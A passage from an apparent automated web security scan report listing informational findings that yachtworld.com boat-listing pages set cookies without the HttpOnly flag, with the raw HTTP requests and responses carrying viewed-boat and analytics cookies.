VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:06 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 25 Jan 2011 16:08:22 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:06 GMT
Set-Cookie: VIEWED_BOATS_STORE=1930392%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B99%2C900%5B%25%5DToms+River%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F1%2F9%2F3%2F0%2F3%2F1930392_8_mini.jpg%3F1282080988000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-1930392%2FToms-River%2FNJ%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.47. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:12 GMT
VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:12 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 06:03:33 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:12 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305173%5B%25%5D32%27+Regulator+32+FS%5B%25%5DUSD%26nbsp%3B69%2C900%5B%25%5DGloucester%2C+VA%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305173_1_mini.jpg%3F1296020707000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-2305173%2FGloucester%2FVA%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.48. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:31 GMT
VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 